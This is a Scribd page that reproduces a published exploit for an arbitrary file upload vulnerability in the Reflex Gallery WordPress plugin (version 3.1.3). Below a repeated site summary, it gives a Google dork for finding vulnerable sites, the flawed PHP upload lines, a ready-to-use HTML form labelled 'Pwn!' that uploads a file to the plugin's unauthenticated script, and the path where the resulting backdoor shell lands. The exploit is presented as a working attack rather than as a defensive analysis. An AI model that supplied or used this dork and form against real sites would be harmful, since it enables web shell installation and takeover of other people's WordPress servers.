Scribd Logo
Upload

Welcome to Scribd!

  • 36374

    Uploaded by

    Diego Pirela
    11 views1 page
    This document summarizes an arbitrary file upload vulnerability in the Reflex Gallery WordPress plugin version 3.1.3. It allows an attacker to upload a malicious PHP file to the uploads folder by exploiting an insecure file upload script in the plugin. Instructions are provided to create an HTML form that can be used to upload a backdoor shell to the specified location on a vulnerable site.

    Original Description:

    DOCUMENTO

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document summarizes an arbitrary file upload vulnerability in the Reflex Gallery WordPress plugin version 3.1.3. It allows an attacker to upload a malicious PHP file to the uploads folder by exploiting an insecure file upload script in the plugin. Instructions are provided to create an HTML form that can be used to upload a backdoor shell to the specified location on a vulnerable site.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    11 views1 page

    36374

    Uploaded by

    Diego Pirela
    This document summarizes an arbitrary file upload vulnerability in the Reflex Gallery WordPress plugin version 3.1.3. It allows an attacker to upload a malicious PHP file to the uploads folder by exploiting an insecure file upload script in the plugin. Instructions are provided to create an HTML form that can be used to upload a backdoor shell to the specified location on a vulnerable site.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 1

    # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload

    # Google Dork: inurl:wp-content/plugins/reflex-gallery/


    # Date: 08.03.2015
    # Exploit Author: CrashBandicot @DosPerl
    # Vendor Homepage: https://wordpress.org/plugins/reflex-gallery/
    # Software Link: https://downloads.wordpress.org/plugin/reflex-gallery.zip
    # Version: 3.1.3 (Last)
    # Tested on: Windows

    # p0C : http://i.imgur.com/mj8yADU.png

    # Path : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
    # add Month and Year in GET for Folder of Shell ./wp-content/uploads/" .
    $_GET['Year'].'/'.$_GET['Month']. "

    Vulnerable File : php.php


    50. if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
    173. $result = $uploader->handleUpload('../../../../../uploads/'.
    $_GET['Year'].'/'.$_GET['Month'].'/');

    # Exploit :

    <form method="POST" action="http://127.0.0.1:1337/wordpress/wp-


    content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?
    Year=2015&Month=03" enctype="multipart/form-data" >
    <input type="file" name="qqfile"><br>
    <input type="submit" name="Submit" value="Pwn!">
    </form>

    # Shell Path : http://127.0.0.1:1337/wordpress/wp-


    content/uploads/2015/03/backdoor.php

    You might also like